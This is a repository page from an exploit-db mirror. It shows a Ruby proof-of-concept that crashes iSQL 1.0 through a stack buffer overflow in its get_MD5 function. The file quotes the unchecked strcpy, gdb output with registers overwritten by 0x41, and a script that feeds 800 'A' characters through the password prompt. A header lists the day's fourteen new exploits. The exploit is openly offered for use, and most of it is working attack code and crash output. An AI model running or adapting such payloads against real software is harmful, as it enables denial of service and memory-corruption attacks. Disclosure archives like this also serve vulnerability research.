bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/linux/dos/39939.rb
Offensive Security 264d15855e DB: 2016-06-14 
14 new exploits

FRticket Ticket System - Stored XSS
Viart Shopping Cart 5.0 - CSRF Shell Upload
Easy RM to MP3 Converter 2.7.3.700 - (.m3u) Exploit with Universal DEP+ASLR Bypass
Dream Gallery 2.0 - Admin Panel Authentication Bypass
Grid Gallery 1.0 - Admin Panel Authentication Bypass
Joomla PayPlans (com_payplans) Extension 3.3.6 - SQL Injection
Zabbix 2.2 - 3.0.3 - RCE with API JSON-RPC
iSQL 1.0 - Shell Command Injection
iSQL 1.0 - isql_main.c Buffer Overflow PoC
Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap-Based Memory Corruption
Foxit PDF Reader 1.0.1.0925 - CPDF_DIBSource::TranslateScanline24bpp Out-of-Bounds Read
Foxit PDF Reader 1.0.1.0925 - CFX_WideString::operator= Invalid Read
Foxit PDF Reader 1.0.1.0925 -kdu_core::kdu_codestream::get_subsampling Memory Corruption
Foxit PDF Reader 1.0.1.0925 - CFX_BaseSegmentedArray::IterateIndex Memory Corruption
2016-06-14 05:03:54 +00:00

64 lines
2.3 KiB
Ruby
Executable file
Raw Blame History

#!/bin/ruby
# Exploit Title: iSQL(RL) 1.0 - Buffer Overflow(isql_main.c)
# Date: 2016-06-13
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/roselone/iSQL
# Software Link: https://github.com/roselone/iSQL/archive/master.zip
# Version: 1.0
# Tested on: Debian [wheezy]
# CVE : none
=begin
### Vulnerability Point
:: [isql_main.c 453 line] strcpy((char *)cmd+5,str); code is vulnerable
:: don't check str size
446 char *get_MD5(char *str){
447 FILE *stream;
448 char *buf=malloc(sizeof(char)*33);
449 char cmd[100];
450 memset(buf,'\0',sizeof(buf));
451 memset(cmd,'\0',sizeof(cmd));
452 strcpy(cmd,"echo "); //5
453 strcpy((char *)cmd+5,str);
Edit makefile > CFLAGS = -fno-stack-protector
#> make
### gdb history
(gdb) r
Starting program: /home/noon/Noon/LAB/exploit/vuln_test/iSQL/isql
*************** welcome to ISQL ****************
* version 1.0 *
* Designed by RL *
* Copyright (c) 2011, RL. All rights reserved *
************************************************
>username: hwul_test
>password: AAAAAAAAAAAAAAAAAAAAAAAAAA... ("A" * 800)
Program received signal SIGSEGV, Segmentation fault.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0x000000000040644c in get_MD5 ()
(gdb) x/s $rax
0x4141414141414141: <error: Cannot access memory at address 0x4141414141414141>
(gdb) x/s $rbp
0x4141414141414141: <error: Cannot access memory at address 0x4141414141414141>
### Registers
(gdb) i r
rax 0x4141414141414141 4702111234474983745
rbx 0x0 0
rcx 0x7ffff7b06480 140737348920448
rdx 0x0 0
rsi 0x60b610 6338064
rdi 0x5 5
rbp 0x4141414141414141 0x4141414141414141
rsp 0x7fffffffe948 0x7fffffffe948
r8 0xffffffff 4294967295
r9 0x0
=end
puts "iSQL 1.0 - Buffer Overflow"
puts " - by hahwul"
puts " - Run BUG.."
buffer = "A"*800
system("(sleep 5; echo -en 'hwul\n';sleep 1;echo -en 'asdf;#{buffer};echo 1';sleep 10) | ./isql")
Reference in a new issue View git blame Copy permalink